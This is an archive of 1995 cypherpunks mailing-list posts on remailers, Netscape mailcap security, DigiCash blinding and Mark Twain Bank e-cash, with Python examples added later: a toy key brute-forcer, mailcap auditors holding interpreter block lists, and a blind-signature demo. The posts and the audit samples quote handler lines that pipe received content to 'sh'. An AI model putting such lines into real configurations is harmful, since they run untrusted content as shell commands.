From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Tue, 24 Oct 95 05:56:16 PDT
To: "Lynne L. Harrison" <lharrison@mhv.net>
Subject: Re: Verification of Registration
In-Reply-To: <9510241224.AA19261@mhv.net>
Message-ID: <9510240752.ZM12430@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


hello, Lynne--

i did, as well.  odd.  any clues?

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Tue, 24 Oct 95 07:53:55 PDT
To: cypherpunks@toad.com
Subject: encryption products
Message-ID: <199510241453.HAA06552@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


    I am presently evaluating / testing / researching three encryption
products and I was wondering if any of ya'll are familiar with them.
1. TECSEC's VEIL product (so far only available through mail order)
2. K. Briggs's Puffer (available for demo download off the web)
3. P. Glen's THE CRYPT (also available off the web)

I am looking for comments about their respective crypto strengths,
versatility, and capability. Thanks in advance for any assistance.

Steve O

*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
 Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Tue, 24 Oct 95 07:41:34 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Remailer-in-a-Box, Everyone a Remailer
Message-ID: <199510241458.HAA27765@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



>Rather, a single physical machine site can and should be able to run many
>remailers, out of user accounts. (Accounts on systems like Sameer's C2. Or
>Hal's remailer running on Portal. Or maybe some of the Mixmaster clients.)

This also brings up the idea of 'opportunistic remailers' again (somebody
gimme a snazzy name for that) - a PC/Mac-based SMTPish server that isn't
always online. Shell accounts are becoming a piece of history for most
users; part-time dialup IP (ppp/slip) is the predominant connectivity layer.
A user could run an opportunistic remailer, and compile a list of other opp
remailers his server would poll in addition to the standard shell-based
'always up' remailers. Given a large enough list (ie, everyone on this list
ran this app in the background) there should be plenty of opp remailers
online and ready to relay at any given time to make this an effective model.
--
   Jay Campbell   Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   MIT PGP KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 08:04:04 PDT
To: cypherpunks@toad.com
Subject: Re: [reformatted] how secure can privasoft be?
Message-ID: <9510241500.AA07290@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > This can at most buy you a constant factor - useful, but not very.
> ...
> > Someone else on this list mentioned that an edge detection algorithm 
> ...
> > It could give you a quick go/no go.
> 
> Don't forget that in most cases it'll be obvious that it's the wrong
> key - only when it isn't would you submit the thing to a second-level
> analyzer to check for edges/characters etc.

I'm confused here.  How will it be obvious?  Unless you mean that you're
going to sit there and watch it while it goes through the, (on average),
999999999/2 keys it would have to try before finding it.  That could
take awhile and really slow things down if it took user intervention
for each test.  You can't beat the human eye on visual discrimination
though.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
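
The automatic go/no-go test debated in this thread, as an added example. It is a constructed toy scrambler, not PrivaSoft's algorithm (which the thread does not specify): tiles are permuted by a key-seeded shuffle, each candidate key is scored by how smoothly pixels line up after descrambling, and the key space is cut to three digits so it runs instantly.

```python
import random

TILE, GRID = 4, 4                 # a page of 4x4 tiles, each 4x4 pixels
SIDE = TILE * GRID
KEYSPACE = 1000                   # three-digit keys, shrunk from nine for the demo
SECRET_KEY = 271                  # constructed sample key


def make_page():
    """Constructed test image: a smooth ramp, so true neighbours look alike."""
    return [[x + SIDE * y for x in range(SIDE)] for y in range(SIDE)]


def tile_order(key):
    order = list(range(GRID * GRID))
    random.Random(key).shuffle(order)   # key-seeded pseudo-random permutation
    return order


def move_tiles(img, order, undo=False):
    """Place tile order[i] at position i, or reverse that mapping when undo is set."""
    out = [[0] * SIDE for _ in range(SIDE)]
    for dst, src in enumerate(order):
        if undo:
            dst, src = src, dst
        dr, dc = divmod(dst, GRID)
        sr, sc = divmod(src, GRID)
        for y in range(TILE):
            for x in range(TILE):
                out[dr * TILE + y][dc * TILE + x] = img[sr * TILE + y][sc * TILE + x]
    return out


def scramble(img, key):
    return move_tiles(img, tile_order(key))


def descramble(img, key):
    return move_tiles(img, tile_order(key), undo=True)


def seam_score(img):
    """Total jump between adjacent pixels; low means the tiles line up."""
    total = 0
    for y in range(SIDE):
        for x in range(SIDE):
            if x + 1 < SIDE:
                total += abs(img[y][x] - img[y][x + 1])
            if y + 1 < SIDE:
                total += abs(img[y][x] - img[y + 1][x])
    return total


def best_key(scrambled):
    """Try every key and keep the one whose output has the smoothest seams."""
    scored = ((seam_score(descramble(scrambled, k)), k) for k in range(KEYSPACE))
    score, key = min(scored)
    return key, score


if __name__ == "__main__":
    page = make_page()
    key, score = best_key(scramble(page, SECRET_KEY))
    print("recovered key:", key, "seam score:", score)
```

No person looks at any candidate here. A slower scoring step multiplies the total work by a constant, while only a longer key enlarges the search itself.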




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Oct 95 05:00:32 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <199510240008.UAA11781@universe.digex.net>
Message-ID: <199510241203.IAA22014@homeport.org>
MIME-Version: 1.0
Content-Type: text


Scott Brickner wrote:

| I had a similar idea that I mentioned to Hal in a private message.  How
| about a POP server that authenticates with crypto, and accepts and
| holds email addressed to the keyid of a PGP key?  You send email to
| 4466A801@keymail.com it holds them for 30 days (or whatever) and
| discards them.  When I connect to the server to retrieve my mail, it
| asks for my public key, encrypts a random challenge with it, and I tell
| it the decrypted version.  Having proved that I can read messages
| encrypted to the key, it delivers messages addressed to the hash of the
| key.  It might also allow me to configure an address where
| notifications of new messages should be sent.

	Who cares if you can read messages encrypted to the key or
not?  Let everyone connect and download whatever messages they want to
see.  They're encrypted, after all.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Tue, 24 Oct 95 05:17:35 PDT
To: sameer@c2.org (sameer)
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal) (fwd)
In-Reply-To: <199510240222.TAA03524@infinity.c2.org>
Message-ID: <199510241217.IAA06524@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain




> denominated in dollars.) Being a money market fund, a positive return
> is -not- guaranteed, and it is not FDIC insured. It is an "investment"
> account, not a "savings" account. (That is my understanding, which
> could very well be flawed.)

Their FAQ indicated FDIC insurance.

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 24 Oct 95 08:27:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <LAA19345.199510231500@garotte.va.pubnix.com>
Message-ID: <308D04F8.7E0F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> > In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
> > [...]
> > >I strongly disagree.  If Netscape provided a way to execute shell
> > >commands on your host from a remote computer, it would certainly be a
> > >hole created by their product.  The fact that the default shell is
> > >potentially dangerous means it's incumbent on those who provide access
> > >to it to provide adequate protection.
> >
> > They do, add:
> >
> > application/x-shell; sh %s
> >
> > to your .mailcap.
> >
> > They had better stop supporting mailcap altogether, after all *any*
> > of the programs in there could have buffer overflows, or other
> > security problems.  I'll bet some of them even do, anyone want to
> > see if sox (a program that transforms sound files from format to
> > format - frequently used to convert .wav files to .au files) has
> > any overruns in the chunk handling code?
> 
> This is where the difference between your view and mine seem to part company.
> I am not talking about some bug in postscript or the shell.  I am talking about
> a program that grants remote access to run these programs in the normal manner,
> which is unsafe.
> 
> To support the position you seem to be taking (and the one currently
> taken by Netscape), you would have to say that the last several Sendmail
> "bugs" were not sendmail problems but rather shell problems because all
> sendmail did was allow you to execute a shell from the remote machine
> (perhaps via a queue file).

  The execution of shell commands by sendmail was not approved
by the user.  The execution of a shell or postscript interpreter, or
whatever, by netscape must be configured by the user.  These are
not the same situation at all.  

> > >If Netscape wants to claim their product doesn't degrade security, they
> > >should provide a safe postscript interpreter or not provide hooks to
> > >unsafe ones.
> >
> > Sure, and they had better find a way to keep us from editing the binary
> > and adding whatever insecure features we may want to their program.
> 
> That's correct.  Secure software has to have secure distribution in
> order to maintain its security when distributed through an untrusted
> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,
> but that would be picking two nits with one keyboard entry).

  I posted a list of MD5 checksums as a personal favor to various cypherpunks
who asked for them, since I have access to the original bits.  The official
Netscape solution for checking your downloaded distribution will be
announced later in the year.  In the meantime anyone who is uncomfortable
with downloading the bits from the net can always buy a copy.  We will
ship them the distribution on floppy.

  Do you have something better than MD5 to suggest?  If so, on what do you
base this opinion?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
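
A minimal version of the audit Dr. Cohen describes (checking mailcap files for unsafe handlers), run over the `application/x-shell; sh %s` entry quoted above. This is an added example, not code from any poster or from Netscape; the interpreter list, the `-dSAFER` rule for `gs`, and the other sample entries are assumptions of the example.

```python
import re
import shlex

# Constructed sample; the x-shell line is the entry quoted in the thread.
SAMPLE_MAILCAP = """\
# constructed sample mailcap
image/gif; xv %s
application/x-shell; sh %s
application/postscript; gs %s
application/postscript; gs -dSAFER -q %s; \\
    description="PostScript, restricted mode"
audio/x-wav; sox %s -t au - > /dev/audio
text/x-perl; /usr/bin/perl %s
"""

# Assumed policy: handlers that execute the received content as a program.
INTERPRETERS = {"sh", "csh", "tcsh", "ksh", "bash", "zsh",
                "perl", "python", "tclsh", "wish", "awk"}
# Assumed policy: Ghostscript must be started in restricted mode.
POSTSCRIPT = {"gs"}


def logical_lines(text):
    """Join backslash-continued lines; drop comments and blank lines."""
    buf = ""
    for raw in text.splitlines():
        if not buf and (not raw.strip() or raw.lstrip().startswith("#")):
            continue
        if raw.endswith("\\"):
            buf += raw[:-1]
            continue
        yield buf + raw
        buf = ""
    if buf:
        yield buf


def parse_entry(line):
    """Return (mime type, view command), or None if the line is malformed."""
    fields = [f.strip() for f in re.split(r"(?<!\\);", line)]
    if len(fields) < 2 or "/" not in fields[0]:
        return None
    return fields[0].lower(), fields[1]


def audit(text):
    """Return (mime type, program, reason) for each handler that needs review."""
    findings = []
    for line in logical_lines(text):
        entry = parse_entry(line)
        if entry is None:
            continue
        mime, command = entry
        for stage in re.split(r"[|;&]+", command):   # each program in a pipeline
            try:
                argv = shlex.split(stage)
            except ValueError:
                argv = stage.split()
            if not argv:
                continue
            prog = argv[0].rsplit("/", 1)[-1]
            if prog in INTERPRETERS:
                findings.append((mime, prog,
                                 "received content is run by a general-purpose interpreter"))
            elif prog in POSTSCRIPT and "-dSAFER" not in argv:
                findings.append((mime, prog,
                                 "PostScript interpreter started without -dSAFER"))
    return findings


if __name__ == "__main__":
    for mime, prog, reason in audit(SAMPLE_MAILCAP):
        print(f"{mime}: {prog}: {reason}")
```

Handlers such as `sox` pass this check even though they may contain parsing bugs of their own, which is the objection raised in the quoted reply; the audit only catches entries that hand content straight to an interpreter.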




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 24 Oct 95 05:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Registration
Message-ID: <9510241224.AA19261@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  Curious.  Did anyone else receive this unsolicited *invitation*?

At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com).
>
>The following magic token in this message [cypherpunks::752400770] will be
>automatically processed to verify you.  Please note: The number included in the token is
>*not* your password; the one to use on the site is the one you entered on
>the registration form.
>
>Please include the complete token appearing above, including the brackets.
>The best way to return it to us is to include this entire message in your
>reply.  If your mailer does not allow you to do this, retype or cut and
>paste the magic token (including the square brackets) into a new message to
>verify@cnet.com. If you are having difficulty completing this process,
>please direct your questions to support@cnet.com.
>
>Once you are verified you will be able to take advantage of the full
>range of c|net online's services.
>
>

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 08:50:44 PDT
To: an413572@anon.penet.fi
Subject: Re: Netscape rewards are an insult
Message-ID: <9510241546.AA07304@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> >                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> WTF?

I'm surprised you didn't get this.  It's a simple phrasal substitution cipher,
sort of like a license plate.  Think of it as this:


      C   SUMO      CLU     NE
      See Sumo      Clue    No (clever putting a foreign word there, eh?
                                But not clever enough to throw us off! )

and realizing that sumo refers to sumo wrestling:

      See wrestling clue    no

and when you realize that a clue tells you about the reality of something:

      See wrestling reality no

or rearranging:

      See wrestling no reality

or:

      See, wrestling has no reality!

And you can see that it's a simple assertion that professional wrestling's
not real.  It's wrong of course.  Think about when they pick someone up
and throw them.  If that happened to me it would hurt...don't you think?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 24 Oct 95 06:50:39 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510240929.AA08313@all.net>
Message-ID: <Pine.SUN.3.90.951024083716.7258A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:

> Date: Tue, 24 Oct 1995 05:29:33 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> > In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
> > >I strongly disagree.  If Netscape provided a way to execute shell
> > >commands on your host from a remote computer, it would certainly be a
> > >hole created by their product.  The fact that the default shell is
> > >potentially dangerous means it's incumbent on those who provide access
> > >to it to provide adequate protection.
> > 
> > They do, add:
> > 
> > application/x-shell; sh %s
> > 
> > to your .mailcap.
> > 
[..rant removed..]
> To support the position you seem to be taking (and the one currently
> taken by Netscape), you would have to say that the last several Sendmail
> "bugs" were not sendmail problems but rather shell problems because all
> sendmail did was allow you to execute a shell from the remote machine
> (perhaps via a queue file).  You would also apparently say that it's
> secure to allow a server to grant unlimited shell access to unknown,
> unauthenticated remote users.  This seems foolhardy to me.

This is complete bullshit. Equating bugs on sendmail to adding the above
to your mailcap, is completely off the wall. Why not try this: compare it to
adding 

	stupidfuck: "|/bin/sh"

Obviously no one in their right mind will put the above on their aliases file.
And please tell me of one MTA that does check for this? You want to add to
sendmail so that it checks for this? Maybe it should also check for
pipes to perl, sed, awk, csh, python, ad nauseum.

Now if you would understand that *people* are supposed to know what to put
into their aliases file, you would understand they need to know what they 
have to put in their mailcap files. There is nothing a program can do 
about it. If you scan for certain interpreters and outlaw them, new ones 
will be created you don't know about.

Your logic is completely flawed.

> That's correct.  Secure software has to have secure distribution in
> order to maintain its security when distributed through an untrusted
> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,
> but that would be picking two nits with one keyboard entry).

Question: Does your software (your stripped-down http server, etc)
do this? I bet not.
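
An audit pass a user could run over their own mailcap, given as an added example that is not part of the original messages: it flags entries such as the `application/x-shell; sh %s` line quoted above, where the downloaded body becomes the interpreter's program. The interpreter list, the sample file and all function names are assumptions, and as the message says, such a list can never be complete.

```python
"""Audit a mailcap file for entries that run the message body as code."""
import os
import re
import shlex

# Assumption: a starting list built from the interpreters named in the thread
# plus common shells. It is a review aid, not a complete blocklist.
INTERPRETERS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh",
                "perl", "python", "awk", "sed", "tclsh"}

# Constructed sample ~/.mailcap (not taken from any real system).
SAMPLE = r"""
# constructed sample
application/x-shell; sh %s
image/gif; xv %s
application/x-perl; /usr/bin/perl %s; needsterminal
text/x-log; sed 's/|/ /g' %s; copiousoutput
application/x-script; cat %s | \
    sh
text/html; lynx -dump %s; copiousoutput
"""


def parse_mailcap(text):
    """Yield (mime_type, view_command) for each RFC 1524 style entry."""
    logical, buf = [], ""
    for raw in text.splitlines():
        if raw.endswith("\\"):          # backslash-newline continues the entry
            buf += raw[:-1]
            continue
        logical.append(buf + raw)
        buf = ""
    if buf:
        logical.append(buf)
    for line in logical:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in re.split(r"(?<!\\);", line)]
        if len(fields) >= 2:
            yield fields[0].lower(), fields[1]


def split_pipeline(cmd):
    """Split a command on '|' characters that are outside quotes."""
    stages, cur, quote = [], [], None
    for ch in cmd:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "|":
            stages.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    stages.append("".join(cur))
    return stages


def audit(text):
    """Return [(mime_type, reason)] for entries that execute the body."""
    findings = []
    for mime, cmd in parse_mailcap(text):
        for stage in split_pipeline(cmd):
            try:
                argv = shlex.split(stage)
            except ValueError:          # unbalanced quotes: fall back
                argv = stage.split()
            if not argv:
                continue
            prog = os.path.basename(argv[0])
            if prog not in INTERPRETERS:
                continue
            operands = [a for a in argv[1:] if not a.startswith("-")]
            if operands[:1] == ["%s"]:
                # The body file is the first operand, i.e. the program text.
                findings.append((mime, f"{prog} runs the body file as its program"))
            elif not operands:
                # No script given: the program is read from stdin, which is
                # the body itself (no %s in the entry) or the pipe.
                findings.append((mime, f"{prog} reads its program from stdin"))
    return findings


if __name__ == "__main__":
    for mime, reason in audit(SAMPLE):
        print(f"{mime}: {reason}")
```
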




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 24 Oct 95 00:50:17 PDT
To: cypherpunks@toad.com
Subject: Hack DigiCash: Payee Anonymity
Message-ID: <199510240750.IAA04175@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Well, Sameer is offering a "Hack DigiCash" promotion, in the same spirit as
the hack Netscape and Microsoft offer.  However, Chaum is a fairly
experienced cryptographer, and I doubt that there are any major security
flaws in the system.  The trial version used RSAREF, so that code at least
was open for your inspection.  There is still the possibility of bugs
creeping in when porting to different platforms tho...

I think the most interesting hack to pursue is to eliminate the
payee-nonanonymity problem.  The current software uses the following
protocol:

The  <--(blinding)--- Client
Bank --(unblinding)-> Client --> Merchant(non-anonymous) --> deposit in bank

The client is anonymous to the bank because of the blinding.  What we want
is for the client to be able to pay someone money, and have the recipient
be able to spend the money anonymously.  That is, there must be blinding
between the payer and the payee:

The  <--(blinding)--- payer <--(blinding)--- payee
Bank --(unblinding)-> payer --(unblinding)-> payee --> payee spends money

The payee generates some digital coins, blinds them, and sends them to the
payer.  The payer then makes a withdrawal from his bank account, blinds the
coins again (or not, it really doesn't matter) and sends them to the bank. 
The bank signs them, and returns them to the payer.  The payer removes his
blinding (if any) and sends them to the payee.  The payee unblinds the
coins and spends them at his leisure.  Privacy for all involved.
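
The exchange proposed above, worked through as an added example that is not part of the original post and is not DigiCash's code. It assumes RSA blind signatures over a SHA-256 digest of the coin serial and uses a constructed toy key; every function name here is hypothetical.

```python
"""Nested RSA blinding: payee blinds, payer blinds again, bank signs."""
import hashlib
import secrets
from math import gcd

# Constructed toy bank key built from two Mersenne primes. Far too small for
# real use; chosen only so the example runs instantly and offline.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # bank's private exponent


def coin_digest(serial: bytes) -> int:
    """Map a coin serial number to the integer the bank ends up signing."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def random_factor() -> int:
    """Pick a blinding factor r that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(value: int, r: int) -> int:
    """Multiply by r^E so the signer cannot recognise the value."""
    return (value * pow(r, E, N)) % N


def unblind(signed: int, r: int) -> int:
    """Divide out r: (value * r^E)^D = value^D * r (mod N)."""
    return (signed * pow(r, -1, N)) % N


def bank_sign(blinded: int) -> int:
    """The bank debits the payer's account and signs what it is handed."""
    return pow(blinded, D, N)


def verify(serial: bytes, signature: int) -> bool:
    """Anyone holding the bank's public key (N, E) can check a coin."""
    return pow(signature, E, N) == coin_digest(serial)


def run_payment(payer_blinds: bool = True) -> dict:
    """Run payee -> payer -> bank -> payer -> payee and record each view."""
    # Payee: mint a serial, blind it, send only the blinded value to the payer.
    serial = secrets.token_bytes(16)
    r_payee = random_factor()
    to_payer = blind(coin_digest(serial), r_payee)

    # Payer: blind again (or not), withdraw by having the bank sign it.
    r_payer = random_factor() if payer_blinds else 1
    to_bank = blind(to_payer, r_payer)
    from_bank = bank_sign(to_bank)

    # Payer removes his own factor and returns the result to the payee.
    to_payee = unblind(from_bank, r_payer)

    # Payee removes her factor; what is left is the bank's signature.
    signature = unblind(to_payee, r_payee)
    return {
        "serial": serial,
        "signature": signature,
        "payer_saw": to_payer,         # blinded coin received from payee
        "payer_saw_signed": to_payee,  # still blinded by r_payee
        "bank_saw": to_bank,           # value the bank actually signed
    }


if __name__ == "__main__":
    t = run_payment()
    print("coin verifies:", verify(t["serial"], t["signature"]))
    print("bank saw the coin digest:", t["bank_saw"] == coin_digest(t["serial"]))
```

With `payer_blinds=False` the coin still verifies, and the value the bank signs is exactly the value the payee sent to the payer.
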




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Gorka" <gorkab@sanchez.com>
Date: Tue, 24 Oct 95 06:23:06 PDT
To: cypherpunks@toad.com
Subject: C|Net
Message-ID: <00998577B2607A40.00004156@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, I got it too.  What is it?

>  Curious.  Did anyone else receive this unsolicited *invitation*?
>
>At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com).
>
----------------crap deleted---------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Tue, 24 Oct 95 05:54:23 PDT
To: lharrison@mhv.net>
Subject: Re[2]: Verification of Registration
Message-ID: <9509248145.AA814550885@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     Yes
     
     wsh


______________________________ Reply Separator _________________________________
Subject: Re: Verification of Registration
Author:  "Lynne L. Harrison" <lharrison@mhv.net> at internet
Date:    24-10-95 09:03


  Curious.  Did anyone else receive this unsolicited *invitation*?
     
At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com). 
>
>The following magic token in this message [cypherpunks::752400770] will be automatically
>processed to verify you.  Please note: The number included in the token is 
>*not* your password; the one to use on the site is the one you entered on 
>the registration form.
>
>Please include the complete token appearing above, including the brackets. 
>The best way to return it to us is to include this entire message in your 
>reply.  If your mailer does not allow you to do this, retype or cut and
>paste the magic token (including the square brackets) into a new message to 
>verify@cnet.com. If you are having difficulty completing this process, 
>please direct your questions to support@cnet.com.
>
>Once you are verified you will be able to take advantage of the full 
>range of c|net online's services.
>
>
     
******************************************************************** 
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net
     
"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@cnet.com
Date: Tue, 24 Oct 95 09:03:11 PDT
Subject: Welcome to c|net
Message-ID: <199510241603.JAA10729@orpheum.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Your verification was successful! You are now a full-fledged member of
c|net online. See you on the Net!

---------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Tue, 24 Oct 95 07:11:16 PDT
To: cypherpunks@toad.com
Subject: Re: Internet Security Review
Message-ID: <199510241410.JAA28216@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Several people have asked me about Internet Security Review. As far as I
can tell I must have registered for a free copy sometime in the recent
past. I think it was on firewalls that I saw it first mentioned. At any
rate, there is a little fold out thingy in the back with some questions
on it to register for a free copy or pass it on to a friend. This appears
to be the introductory issue.

Here's what it looks like:

_ YES, I want to receive Internet Security Review

   _____________________________________
    (signature is essential)

 Please answer all of the following questions, sign and mail form to:
 Internet Security Review, Postoffice Box 2236, Naples, Florida 33939, USA

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

01	Name
02	Company/Agency
03	Dept./mail route
04	Mail address
05	City
06	State
07	Zip code
08	Country
09	Is the address above your business address ?	_ Yes	_ No
10	What is your current position ?	_ Corporate executive	_ Management
	_ Supervision	_ Employee	_ Student
	_ Other ________________________________________________
11	Is information security a part of your day to day responsibility ?
	_ Yes	_ No
12	Does your job include the administration and/or maintenance of an
	Internet site ?	_ Yes	_ No
13	Does your job include the supervision of (one or more) Internet
	site(s) ?	_ Yes	_ No
14	Does your position include advisory on soft- and hardware/peripheral
	purchases essential for Internet site security ?
	_ Advisory	_ Decisionmaker
15	What is your email address ?
16	Are you using PGP encryption with message interchange, or a different
	encryption program ?
	_ PGP	_ Other, please complete ____________________________________
17	Are you in favor of key escrow?	_ Yes	_ No
18	Is (are) the site(s) within your responsibility using a firewall ? 
	_ Yes	_ No
19	Is (are) the site(s) within your responsibility using special access
	devices (smart cards, tokens, etc.)	_ Yes	_ No
20	From time to time, we will ask your opinion on various aspects of
	Internet security. Are you available to cooperate ? 	_ Yes	_ No
21	What particular topics would you like to see covered in Internet
	Security Review ?
	___________________________________________________________________
	___________________________________________________________________
	___________________________________________________________________



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 24 Oct 95 09:15:29 PDT
To: (Recipient list suppressed)
Subject: Re: Mark Twain Bank
Message-ID: <v02120d02acb2c5bc4466@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>Well just another bit of information. On their FAQ they say to mail to
>shops@marktwain.com for more information on merchant accounts. Well the
>address does not exist. Not a very good start. I hope they get their act
>together.
>

They STILL haven't fixed that? I complained about it to Trotter
on Sunday night. It looks a lot like the marktwain.com domain is run
by SPS Productions, and that MTB doesn't have direct control over
something as simple as adding a mail alias.

FWIW, I have heard some nice things about MTB _as a bank_, but they
not only seem technically clueless, they seem to have made a very
poor choice in outsourcing the technical aspects of this job. They
also appear to have _no clue whatsoever_ about how to market this
service. When three reasonably intelligent people can obtain three
_completely different_ ideas of how the MTB e-cash accounts are set
up, they're in a world of hurt, 'cause most people aren't even going
to take the time.  Aaaargh!

Also, http://marktwain.com is the home page for this SPS Productions
outfit...  these are apparently the ones responsible for the
look of their web page (at first I thought that MTB had interpreted
the request to "fix their web page" as a request to "tart it up",
but it turned out to be the page for these other folks.) They appear
to be located in Wisconsin, of all places.

Also, an outfit called "MIDS.com" (M&I Data Services) seem to be
involved in this. Another outfit from Wisconsin. Weird. (Time to
look at a map and see where Wisconsin is wrt MO. I think they're
both in the middle. :-) I may be guilty of a bit of crass regionalism,
but Wisconsin is not a place I associate strongly with either
outstanding graphical design or with Internet savvy. Mostly I think
